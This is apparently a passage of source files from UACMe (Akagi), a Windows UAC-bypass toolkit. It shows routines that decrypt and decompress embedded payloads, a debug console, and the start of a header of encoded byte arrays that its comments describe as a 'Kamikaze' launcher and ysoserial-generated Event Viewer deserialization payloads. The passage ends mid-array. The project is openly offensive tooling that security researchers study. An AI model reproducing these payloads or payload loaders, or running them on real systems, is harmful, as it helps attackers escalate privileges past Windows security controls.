= 0;\n\n if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,\n BCRYPT_BLOCK_LENGTH,\n (PUCHAR)&cbBlockLen,\n sizeof(DWORD),\n &cbResult,\n 0)))\n {\n break;\n }\n\n if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)\n break;\n\n if (!NT_SUCCESS(BCryptGenerateSymmetricKey(\n hAlgAes,\n &hKey,\n pbKeyObject,\n cbKeyObject,\n pbSecret,\n cbSecret,\n 0)))\n {\n break;\n }\n\n cbCipherData = 0;\n if (!NT_SUCCESS(BCryptDecrypt(\n hKey,\n pbBuffer,\n cbBuffer,\n NULL,\n pbIV,\n cbBlockLen,\n NULL,\n 0,\n &cbCipherData,\n BCRYPT_BLOCK_PADDING)))\n {\n break;\n }\n\n memIO = (SIZE_T)cbCipherData;\n\n pbCipherData = (PBYTE)supVirtualAlloc(\n &memIO,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE,\n &status);\n\n if ((!NT_SUCCESS(status)) || (pbCipherData == NULL))\n break;\n\n cbResult = 0;\n if (!NT_SUCCESS(BCryptDecrypt(\n hKey,\n pbBuffer,\n cbBuffer,\n NULL,\n pbIV,\n cbBlockLen,\n pbCipherData,\n cbCipherData,\n &cbResult,\n BCRYPT_BLOCK_PADDING)))\n {\n break;\n }\n\n BCryptDestroyKey(hKey);\n hKey = NULL;\n\n *pbDecryptedBuffer = pbCipherData;\n *pcbDecryptedBuffer = cbCipherData;\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (hKey != NULL)\n BCryptDestroyKey(hKey);\n\n if (hAlgAes != NULL)\n BCryptCloseAlgorithmProvider(hAlgAes, 0);\n\n if (heapCNG) HeapDestroy(heapCNG);\n\n if (bResult == FALSE) {\n if (pbCipherData) supVirtualFree(pbCipherData, NULL);\n *pbDecryptedBuffer = NULL;\n *pcbDecryptedBuffer = 0;\n }\n\n return bResult;\n}\n\n/*\n* DecompressContainerUnit\n*\n* Purpose:\n*\n* Decompress given container.\n*\n* Use supVirtualFree to release allocated result.\n*\n*/\nPVOID DecompressContainerUnit(\n _In_ PBYTE pbBuffer,\n _In_ DWORD cbBuffer,\n _In_ PBYTE pbSecret,\n _In_ DWORD cbSecret,\n _Out_ PULONG pcbDecompressed\n)\n{\n PDCU_HEADER UnitHeader;\n\n PBYTE pbDecryptedBuffer = NULL;\n DWORD cbDecryptedBuffer = 0;\n\n DELTA_INPUT diDelta, diSource;\n DELTA_OUTPUT doOutput;\n\n PVOID UncompressedData = NULL;\n SIZE_T memIO;\n\n PBYTE DataPtr;\n\n NTSTATUS status;\n\n if (pcbDecompressed)\n *pcbDecompressed = 0;\n\n do {\n\n UnitHeader = (PDCU_HEADER)pbBuffer;\n\n if (!IsValidContainerHeader(UnitHeader, cbBuffer))\n break;\n\n DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);\n\n if (!DecryptBuffer(\n (PBYTE)DataPtr,\n (DWORD)UnitHeader->cbData,\n (PBYTE)UnitHeader->bIV,\n (PBYTE)pbSecret,\n (DWORD)cbSecret,\n (PBYTE*)&pbDecryptedBuffer,\n (PDWORD)&cbDecryptedBuffer))\n {\n break;\n }\n\n if (cbDecryptedBuffer > cbBuffer)\n break;\n\n RtlSecureZeroMemory(&diSource, sizeof(DELTA_INPUT));\n RtlSecureZeroMemory(&diDelta, sizeof(DELTA_INPUT));\n RtlSecureZeroMemory(&doOutput, sizeof(DELTA_OUTPUT));\n\n diDelta.Editable = FALSE;\n diDelta.lpcStart = pbDecryptedBuffer;\n diDelta.uSize = UnitHeader->cbDeltaSize;\n\n if (ApplyDeltaB(DELTA_FILE_TYPE_RAW, diSource, diDelta, &doOutput)) {\n\n memIO = doOutput.uSize;\n UncompressedData = supVirtualAlloc(\n &memIO,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE,\n &status);\n\n if ((NT_SUCCESS(status)) && (UncompressedData != NULL)) {\n\n RtlCopyMemory(UncompressedData, doOutput.lpStart, doOutput.uSize);\n if (pcbDecompressed)\n *pcbDecompressed = (ULONG)doOutput.uSize;\n\n }\n DeltaFree(doOutput.lpStart);\n }\n\n } while (FALSE);\n\n if (pbDecryptedBuffer != NULL) {\n supVirtualFree(pbDecryptedBuffer, NULL);\n }\n\n return UncompressedData;\n}\n\n/*\n* DecompressPayload\n*\n* Purpose:\n*\n* Decode payload and then decompress it.\n*\n*/\nPVOID DecompressPayload(\n _In_ ULONG PayloadId,\n _In_ PVOID pbBuffer,\n _In_ ULONG cbBuffer,\n _Out_ PULONG pcbDecompressed\n)\n{\n BOOL bResult = FALSE;\n ULONG FinalDecompressedSize = 0;\n SIZE_T memIO;\n PUCHAR UncompressedData = NULL;\n\n PVOID Data = NULL;\n\n PBYTE pbSecret = NULL;\n DWORD cbSecret = 0, DataSize;\n\n NTSTATUS status;\n\n __try {\n\n DataSize = cbBuffer;\n\n do {\n\n //\n // Make a writeable buffer copy.\n //\n\n memIO = DataSize;\n Data = supVirtualAlloc(\n (PSIZE_T)&memIO,\n DEFAULT_ALLOCATION_TYPE,\n DEFAULT_PROTECT_TYPE,\n &status);\n\n if ((!NT_SUCCESS(status)) || (Data == NULL))\n break;\n\n supCopyMemory(Data, memIO, pbBuffer, DataSize);\n\n //\n // Get key for decryption.\n //\n pbSecret = (PBYTE)SelectSecretFromBlob(PayloadId, &cbSecret);\n if ((pbSecret == NULL) || (cbSecret == 0))\n break;\n\n UncompressedData = (PUCHAR)DecompressContainerUnit(\n (PBYTE)Data,\n DataSize,\n pbSecret,\n cbSecret,\n &FinalDecompressedSize);\n\n if (UncompressedData == NULL)\n break;\n\n //\n // Validate uncompressed data, skip for dotnet.\n //\n if (!supVerifyMappedImageMatchesChecksum(UncompressedData, FinalDecompressedSize)) {\n\n if (!supIsCorImageFile(UncompressedData)) {\n\n#ifdef _DEBUG\n supDebugPrint(\n TEXT(\"DecompressPayload\"),\n ERROR_DATA_CHECKSUM_ERROR);\n#endif\n break;\n }\n }\n\n bResult = TRUE;\n\n } while (FALSE);\n\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n bResult = FALSE;\n }\n\n if (pbSecret) supHeapFree(pbSecret);\n\n if (Data) {\n supVirtualFree(Data, NULL);\n }\n\n if (bResult == FALSE) {\n if (UncompressedData != NULL) {\n supVirtualFree(UncompressedData, NULL);\n UncompressedData = NULL;\n }\n FinalDecompressedSize = 0;\n }\n\n if (pcbDecompressed)\n *pcbDecompressed = FinalDecompressedSize;\n\n return UncompressedData;\n}\n"
},
{
"path": "Source/Akagi/compress.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2022\n*\n* TITLE: COMPRESS.H\n*\n* VERSION: 3.61\n*\n* DATE: 22 Jun 2022\n*\n* Prototypes and definitions for compression.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#include \n#include \n#include \n\n#define UACME_CONTAINER_PACKED_UNIT 'UPCU' //Naka handling\n#define UACME_CONTAINER_PACKED_DATA 'DPCU' //Naka handling\n#define UACME_CONTAINER_PACKED_CODE 'CPCU' //Kuma handling\n#define UACME_CONTAINER_PACKED_KEYS 'KPCU' //Kuma handling\n\n//Initialization vector max bytes\n#define DCU_IV_MAX_BLOCK_LENGTH 16\n\ntypedef struct _DCU_HEADER {\n DWORD Magic;\n DWORD cbData;\n DWORD cbDeltaSize;\n DWORD HeaderCrc;\n BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];\n //PBYTE pbData[1]; /* not a member of the structure */\n} DCU_HEADER, *PDCU_HEADER;\n\ntypedef PVOID(*pfnDecompressPayload)(\n _In_ ULONG PayloadId,\n _In_ PVOID pbBuffer,\n _In_ ULONG cbBuffer,\n _Out_ PULONG pcbDecompressed);\n\nPVOID DecompressPayload(\n _In_ ULONG PayloadId,\n _In_ PVOID pbBuffer,\n _In_ ULONG cbBuffer,\n _Out_ PULONG pcbDecompressed);\n\nVOID EncodeBuffer(\n _In_ PVOID Buffer,\n _In_ ULONG BufferSize,\n _In_ ULONG Key);\n"
},
{
"path": "Source/Akagi/console.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2022 - 2026\n*\n* TITLE: CONSOLE.C\n*\n* VERSION: 3.69\n*\n* DATE: 12 Feb 2026\n*\n* Debug console.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\nHANDLE StdOutputHandle = NULL;\n\npswprintf_s _swprintf_s = NULL;\n\nVOID ConsolePrint(\n _In_ LPCWSTR Message\n)\n{\n WriteConsole(StdOutputHandle, Message, (ULONG)_strlen(Message), NULL, NULL);\n}\n\nVOID ConsolePrintValueUlong(\n _In_ LPCWSTR Message,\n _In_ ULONG Value,\n _In_ BOOL Hexademical\n)\n{\n WCHAR szText[200];\n\n if (_swprintf_s) {\n\n _swprintf_s(szText, RTL_NUMBER_OF(szText),\n Hexademical ? TEXT(\"%ws 0x%lX\\r\\n\") : TEXT(\"%ws %lu\\r\\n\"),\n Message,\n Value);\n\n ConsolePrint(szText);\n }\n}\n\nVOID ConsolePrintStatus(\n _In_ LPCWSTR Message,\n _In_ NTSTATUS Status\n)\n{\n ConsolePrintValueUlong(Message, Status, TRUE);\n}\n\nVOID ConsoleInit(\n VOID\n)\n{\n WCHAR szBuffer[100];\n HMODULE hNtdll = GetModuleHandle(L\"ntdll.dll\");\n\n if (hNtdll == NULL || !AllocConsole())\n return;\n\n _swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, \"swprintf_s\");\n if (_swprintf_s == NULL)\n return;\n\n StdOutputHandle = GetStdHandle(STD_OUTPUT_HANDLE);\n SetConsoleMode(StdOutputHandle, ENABLE_PROCESSED_OUTPUT |\n ENABLE_VIRTUAL_TERMINAL_PROCESSING);\n\n _swprintf_s(szBuffer, RTL_NUMBER_OF(szBuffer), TEXT(\"[*] UACMe v%lu.%lu.%lu.%lu\\r\\n\"),\n UCM_VERSION_MAJOR,\n UCM_VERSION_MINOR,\n UCM_VERSION_REVISION,\n UCM_VERSION_BUILD);\n\n SetConsoleTitle(szBuffer);\n}\n\nBOOL ConsoleIsKeyPressed(\n _In_ WORD VirtualKeyCode\n)\n{\n BOOL bResult = FALSE;\n DWORD numberOfEvents = 0;\n INPUT_RECORD inp1;\n HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);\n\n GetNumberOfConsoleInputEvents(nStdHandle, &numberOfEvents);\n\n if (numberOfEvents) {\n\n PeekConsoleInput(nStdHandle, &inp1, 1, &numberOfEvents);\n\n bResult = (numberOfEvents != 0 &&\n inp1.EventType == KEY_EVENT &&\n inp1.Event.KeyEvent.bKeyDown &&\n inp1.Event.KeyEvent.wVirtualKeyCode == VirtualKeyCode);\n\n FlushConsoleInputBuffer(nStdHandle);\n }\n\n return bResult;\n}\n\nVOID ConsoleRelease(\n VOID\n)\n{\n DWORD dwStart = GetTickCount();\n HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);\n\n if (nStdHandle == NULL || nStdHandle == INVALID_HANDLE_VALUE) {\n FreeConsole();\n return;\n }\n\n ConsolePrint(TEXT(\"[+] Press Enter to exit or wait few seconds and it will close automatically\\r\\n\"));\n\n FlushConsoleInputBuffer(nStdHandle);\n while (!ConsoleIsKeyPressed(VK_RETURN) && (GetTickCount() - dwStart) < (10 * 1000))\n Sleep(50);\n\n FreeConsole();\n}\n"
},
{
"path": "Source/Akagi/console.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2022\n*\n* TITLE: CONSOLE.H\n*\n* VERSION: 3.62\n*\n* DATE: 08 Jul 2022\n*\n* Debug console header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\nVOID ConsoleInit(\n VOID);\n\nVOID ConsoleRelease(\n VOID);\n\nVOID ConsolePrintStatus(\n _In_ LPCWSTR Message,\n _In_ NTSTATUS Status);\n\nVOID ConsolePrint(\n _In_ LPCWSTR Message);\n\nVOID ConsolePrintValueUlong(\n _In_ LPCWSTR Message,\n _In_ ULONG Value,\n _In_ BOOL Hexademical);\n\n#ifdef _UCM_CONSOLE\n#define ucmConsoleInit ConsoleInit\n#define ucmConsoleRelease ConsoleRelease\n#define ucmConsolePrintStatus ConsolePrintStatus\n#define ucmConsolePrint ConsolePrint\n#define ucmConsolePrintValueUlong ConsolePrintValueUlong\n#else\n#define ucmConsoleInit()\n#define ucmConsoleRelease()\n#define ucmConsolePrintStatus(Message, Status)\n#define ucmConsolePrint(Message)\n#define ucmConsolePrintValueUlong(Message, Value, Hexademical)\n#endif\n"
},
{
"path": "Source/Akagi/encresource.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2025\n*\n* TITLE: ENCRESOURCE.H\n*\n* VERSION: 3.68\n*\n* DATE: 07 Mar 2025\n*\n* Encoded string resources.\n*\n* 1) g_encodedKamikazeFinal - Kamikaze final stage launcher\n* 2) string table elements\n* 3) g_encodedRecentViews - eventvwr cache element generated with yososerial\n* 4) g_encodedRecentViewsV2 - eventvwr cache element for dotnet2 generated with ysoserial\n* 5) g_encodedTaskParamBegin, g_encodedTaskParamEnd - parameters data for the scheduler task\n* 6) g_webviewvsinfo - WebView version info block\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nstatic const unsigned char g_encodedKamikazeFinal[121] = {\n 0x46, 0x9C, 0x9D, 0xBE, 0xCA, 0x73, 0xA6, 0x57, 0x04, 0xB2, 0xD4, 0x65, 0x8A, 0x1E, 0xB8, 0xC4,\n 0x04, 0xAA, 0xC1, 0x55, 0xB3, 0xD5, 0x2E, 0xD0, 0x19, 0xB8, 0xCC, 0x37, 0x99, 0x2A, 0xA6, 0xD8,\n 0x19, 0x81, 0x9D, 0xB6, 0xF5, 0x25, 0xFF, 0x59, 0x07, 0x95, 0xC2, 0x36, 0xDB, 0x0C, 0xB5, 0xD2,\n 0x45, 0xF8, 0x90, 0x1F, 0xB3, 0xC0, 0x2A, 0x90, 0x37, 0x8A, 0xC2, 0x28, 0xDC, 0x41, 0xBB, 0xC5,\n 0x1F, 0xD6, 0xC5, 0xF1, 0x83, 0x3E, 0xE3, 0x46, 0x1F, 0xB3, 0xC0, 0x3F, 0xC4, 0x04, 0xAD, 0xD3,\n 0x48, 0xF8, 0x99, 0x49, 0xF4, 0x81, 0x78, 0xE7, 0x0E, 0xA5, 0xD9, 0x34, 0xC5, 0x0A, 0xBA, 0x9F,\n 0x53, 0xCF, 0xD5, 0xFC, 0xD5, 0x2E, 0xE8, 0x5C, 0x1B, 0xA2, 0x93, 0x67, 0x99, 0x0F, 0xB4, 0xD2,\n 0x14, 0xE4, 0x89, 0x44, 0xBE, 0xD9, 0x37, 0xD9, 0x55\n};\n\nstatic const unsigned char g_encodedRecentViews[1411] = {\n\t0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0xB0, 0x61, 0xC2, 0x85, 0xF5, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF8, 0xEB, 0xD3, 0xA7, 0x4F, 0xD0, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDA, 0x5C,\n\t0x0E, 0x95, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x93, 0x61, 0xAE, 0x13,\n\t0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48,\n\t0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69,\n\t0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A, 0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E,\n\t0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x4A, 0x9F, 0x3D, 0x7A, 0xF4, 0xFA, 0x80, 0xDE, 0x3C, 0xEA, 0x58,\n\t0x17, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0x94, 0x3D,\n\t0x7A, 0xF4, 0xFF, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x81, 0xC2, 0x22, 0xF1, 0x49,\n\t0x13, 0x9A, 0x8E, 0x95, 0xC8, 0x3D, 0xF3, 0x5C, 0x0E, 0xE7, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58,\n\t0x0E, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58, 0x0E, 0xBA, 0x88, 0xBE, 0xC2, 0x5E, 0xDA, 0x5C,\n\t0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xD0, 0x5C, 0x17, 0x91, 0x9A, 0xA3, 0xC6, 0x2C, 0xFB, 0x33,\n\t0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13, 0x2A, 0x86, 0x8C, 0xB5, 0xCE, 0x37, 0x8B, 0x79,\n\t0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0xB0, 0x7E, 0x1B, 0x87, 0x8C, 0x80, 0xC2, 0x21, 0xED, 0x54,\n\t0x0E, 0x9D, 0x9F, 0xB6, 0xB5, 0x0B, 0xFF, 0x49, 0x1B, 0xA7, 0x8C, 0xA7, 0x89, 0x03, 0xF1, 0x5E,\n\t0x1B, 0x98, 0x8C, 0x9F, 0xE4, 0x06, 0xDA, 0x27, 0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13,\n\t0x3F, 0x9A, 0x8F, 0xBC, 0xD5, 0x2C, 0xFB, 0x7E, 0x15, 0x9A, 0x9A, 0xA7, 0xD5, 0x2E, 0xF7, 0x53,\n\t0x0E, 0x87, 0xF3, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x96, 0xDF, 0x3B, 0xFB, 0x53,\n\t0x1E, 0x91, 0x8D, 0x83, 0xD5, 0x20, 0xEE, 0x58, 0x08, 0x80, 0x80, 0xB6, 0xD4, 0x5B, 0xDA, 0x5C,\n\t0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xCA, 0x5C, 0x18, 0x98, 0x8C, 0xA0, 0x89, 0x0C, 0xF1, 0x48,\n\t0x14, 0x80, 0xF9, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x87, 0xC6, 0x2D, 0xF2, 0x58,\n\t0x09, 0xAB, 0xD9, 0xD7, 0xA6, 0x4E, 0x9F, 0x3D, 0x7A, 0xF4, 0xEB, 0xD3, 0xA0, 0x50, 0xCD, 0x44,\n\t0x09, 0x80, 0x8C, 0xBE, 0x89, 0x0B, 0xFF, 0x49, 0x1B, 0xDA, 0xBA, 0xB6, 0xD5, 0x26, 0xFF, 0x51,\n\t0x13, 0x8E, 0x88, 0xA7, 0xCE, 0x20, 0xF0, 0x7B, 0x15, 0x86, 0x84, 0xB2, 0xD3, 0x4D, 0x9E, 0x3D,\n\t0x7A, 0xF5, 0xE1, 0xD2, 0xAF, 0x4D, 0x9C, 0x3D, 0x7A, 0xF4, 0xEC, 0x2E, 0x58, 0xB0, 0x61, 0x22,\n\t0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0xFD, 0xF4, 0x2A, 0xEC, 0x54,\n\t0x1B, 0x98, 0x80, 0xA9, 0xC6, 0x3B, 0xF7, 0x52, 0x14, 0xB2, 0x86, 0xA1, 0xCA, 0x2E, 0xEA, 0x3C,\n\t0x7A, 0xF4, 0xE9, 0xD4, 0xD1, 0x2E, 0xF2, 0x48, 0x1F, 0xAB, 0xB6, 0xD3, 0xAF, 0x4D, 0x9E, 0x3D,\n\t0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0x49, 0x9A, 0x3D, 0x7A, 0xF4, 0xE9, 0xDA, 0xA3, 0x4F, 0x9E, 0x3D,\n\t0x73, 0xF0, 0xE9, 0xD3, 0xA7, 0x4F, 0x97, 0x39, 0x7A, 0xF4, 0xE9, 0xD9, 0xA6, 0x4F, 0x9E, 0x3D,\n\t0x73, 0xF1, 0xE9, 0xD3, 0xA7, 0x40, 0x9B, 0x3D, 0x7A, 0xF4, 0x7A, 0xD0, 0xA7, 0x4F, 0x9C, 0x3D,\n\t0x7B, 0xF4, 0xE9, 0xD3, 0x58, 0xB0, 0x61, 0xC2, 0x7B, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x76, 0xF6, 0xE9, 0xD3, 0xA7, 0x11, 0xD3, 0x54, 0x19, 0x86, 0x86, 0xA0, 0xC8, 0x29, 0xEA, 0x13,\n\t0x2A, 0x9B, 0x9E, 0xB6, 0xD5, 0x1C, 0xF6, 0x58, 0x16, 0x98, 0xC7, 0x96, 0xC3, 0x26, 0xEA, 0x52,\n\t0x08, 0xD8, 0xC9, 0x85, 0xC2, 0x3D, 0xED, 0x54, 0x15, 0x9A, 0xD4, 0xE0, 0x89, 0x7F, 0xB0, 0x0D,\n\t0x54, 0xC4, 0xC5, 0xF3, 0xE4, 0x3A, 0xF2, 0x49, 0x0F, 0x86, 0x8C, 0xEE, 0xC9, 0x2A, 0xEB, 0x49,\n\t0x08, 0x95, 0x85, 0xFF, 0x87, 0x1F, 0xEB, 0x5F, 0x16, 0x9D, 0x8A, 0x98, 0xC2, 0x36, 0xCA, 0x52,\n\t0x11, 0x91, 0x87, 0xEE, 0x94, 0x7E, 0xFC, 0x5B, 0x49, 0xCC, 0xDC, 0xE5, 0xC6, 0x2B, 0xAD, 0x0B,\n\t0x4E, 0x91, 0xDA, 0xE6, 0xA2, 0x4E, 0x9E, 0x3D, 0x7A, 0xB6, 0xA4, 0xBA, 0xC4, 0x3D, 0xF1, 0x4E,\n\t0x15, 0x92, 0x9D, 0xFD, 0xF1, 0x26, 0xED, 0x48, 0x1B, 0x98, 0xBA, 0xA7, 0xD2, 0x2B, 0xF7, 0x52,\n\t0x54, 0xA0, 0x8C, 0xAB, 0xD3, 0x61, 0xD8, 0x52, 0x08, 0x99, 0x88, 0xA7, 0xD3, 0x26, 0xF0, 0x5A,\n\t0x54, 0xA0, 0x8C, 0xAB, 0xD3, 0x09, 0xF1, 0x4F, 0x17, 0x95, 0x9D, 0xA7, 0xCE, 0x21, 0xF9, 0x6F,\n\t0x0F, 0x9A, 0xB9, 0xA1, 0xC8, 0x3F, 0xFB, 0x4F, 0x0E, 0x9D, 0x8C, 0xA0, 0xA6, 0x4F, 0x9E, 0x3D,\n\t0x75, 0xB2, 0x86, 0xA1, 0xC2, 0x28, 0xEC, 0x52, 0x0F, 0x9A, 0x8D, 0x91, 0xD5, 0x3A, 0xED, 0x55,\n\t0x7B, 0xF6, 0xE9, 0xD3, 0xA7, 0x49, 0x9D, 0x3D, 0x7A, 0xF4, 0x5C, 0xD6, 0x9B, 0x70, 0xE6, 0x50,\n\t0x16, 0xD4, 0x9F, 0xB6, 0xD5, 0x3C, 0xF7, 0x52, 0x14, 0xC9, 0xCB, 0xE2, 0x89, 0x7F, 0xBC, 0x1D,\n\t0x1F, 0x9A, 0x8A, 0xBC, 0xC3, 0x26, 0xF0, 0x5A, 0x47, 0xD6, 0x9C, 0xA7, 0xC1, 0x62, 0xA6, 0x1F,\n\t0x45, 0xCA, 0xE4, 0xD9, 0x9B, 0x00, 0xFC, 0x57, 0x1F, 0x97, 0x9D, 0x97, 0xC6, 0x3B, 0xFF, 0x6D,\n\t0x08, 0x9B, 0x9F, 0xBA, 0xC3, 0x2A, 0xEC, 0x1D, 0x37, 0x91, 0x9D, 0xBB, 0xC8, 0x2B, 0xD0, 0x5C,\n\t0x17, 0x91, 0xD4, 0xF1, 0xF4, 0x3B, 0xFF, 0x4F, 0x0E, 0xD6, 0xC9, 0x9A, 0xD4, 0x06, 0xF0, 0x54,\n\t0x0E, 0x9D, 0x88, 0xBF, 0xEB, 0x20, 0xFF, 0x59, 0x3F, 0x9A, 0x88, 0xB1, 0xCB, 0x2A, 0xFA, 0x00,\n\t0x58, 0xB2, 0x88, 0xBF, 0xD4, 0x2A, 0xBC, 0x1D, 0x02, 0x99, 0x85, 0xBD, 0xD4, 0x72, 0xBC, 0x55,\n\t0x0E, 0x80, 0x99, 0xE9, 0x88, 0x60, 0xED, 0x5E, 0x12, 0x91, 0x84, 0xB2, 0xD4, 0x61, 0xF3, 0x54,\n\t0x19, 0x86, 0x86, 0xA0, 0xC8, 0x29, 0xEA, 0x13, 0x19, 0x9B, 0x84, 0xFC, 0xD0, 0x26, 0xF0, 0x5B,\n\t0x02, 0xDB, 0xDB, 0xE3, 0x97, 0x79, 0xB1, 0x45, 0x1B, 0x99, 0x85, 0xFC, 0xD7, 0x3D, 0xFB, 0x4E,\n\t0x1F, 0x9A, 0x9D, 0xB2, 0xD3, 0x26, 0xF1, 0x53, 0x58, 0xD4, 0x91, 0xBE, 0xCB, 0x21, 0xED, 0x07,\n\t0x09, 0x90, 0xD4, 0xF1, 0xC4, 0x23, 0xEC, 0x10, 0x14, 0x95, 0x84, 0xB6, 0xD4, 0x3F, 0xFF, 0x5E,\n\t0x1F, 0xCE, 0xBA, 0xAA, 0xD4, 0x3B, 0xFB, 0x50, 0x54, 0xB0, 0x80, 0xB2, 0xC0, 0x21, 0xF1, 0x4E,\n\t0x0E, 0x9D, 0x8A, 0xA0, 0x9C, 0x2E, 0xED, 0x4E, 0x1F, 0x99, 0x8B, 0xBF, 0xDE, 0x72, 0xCD, 0x44,\n\t0x09, 0x80, 0x8C, 0xBE, 0x85, 0x6F, 0xE6, 0x50, 0x16, 0x9A, 0x9A, 0xE9, 0xDF, 0x72, 0xBC, 0x55,\n\t0x0E, 0x80, 0x99, 0xE9, 0x88, 0x60, 0xED, 0x5E, 0x12, 0x91, 0x84, 0xB2, 0xD4, 0x61, 0xF3, 0x54,\n\t0x19, 0x86, 0x86, 0xA0, 0xC8, 0x29, 0xEA, 0x13, 0x19, 0x9B, 0x84, 0xFC, 0xD0, 0x26, 0xF0, 0x5B,\n\t0x02, 0xDB, 0xDB, 0xE3, 0x97, 0x79, 0xB1, 0x45, 0x1B, 0x99, 0x85, 0xF1, 0x99, 0x42, 0x94, 0x1D,\n\t0x5A, 0xC8, 0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49, 0x3E, 0x95, 0x9D, 0xB2, 0xF7, 0x3D, 0xF1, 0x4B,\n\t0x13, 0x90, 0x8C, 0xA1, 0x89, 0x00, 0xFC, 0x57, 0x1F, 0x97, 0x9D, 0x9A, 0xC9, 0x3C, 0xEA, 0x5C,\n\t0x14, 0x97, 0x8C, 0xED, 0xAA, 0x45, 0xBE, 0x1D, 0x5A, 0xD4, 0xD5, 0xA0, 0xC3, 0x75, 0xCE, 0x4F,\n\t0x15, 0x97, 0x8C, 0xA0, 0xD4, 0x71, 0x93, 0x37, 0x5A, 0xD4, 0xC9, 0xF3, 0x87, 0x6F, 0xA2, 0x4E,\n\t0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E, 0x09, 0xDA, 0xBA, 0xA7, 0xC6, 0x3D, 0xEA, 0x74,\n\t0x14, 0x92, 0x86, 0xED, 0xAA, 0x45, 0xBE, 0x1D, 0x5A, 0xD4, 0xC9, 0xF3, 0x87, 0x6F, 0xA2, 0x4E,\n\t0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E, 0x09, 0xA7, 0x9D, 0xB2, 0xD5, 0x3B, 0xD7, 0x53,\n\t0x1C, 0x9B, 0xC9, 0x92, 0xD5, 0x28, 0xEB, 0x50, 0x1F, 0x9A, 0x9D, 0xA0, 0x9A, 0x6D, 0xB1, 0x5E,\n\t0x5A, 0xD1, 0x99, 0xB6, 0x94, 0x77, 0xA8, 0x18, 0x58, 0xD4, 0xBA, 0xA7, 0xC6, 0x21, 0xFA, 0x5C,\n\t0x08, 0x90, 0xAC, 0xA1, 0xD5, 0x20, 0xEC, 0x78, 0x14, 0x97, 0x86, 0xB7, 0xCE, 0x21, 0xF9, 0x00,\n\t0x58, 0x8F, 0x91, 0xE9, 0xE9, 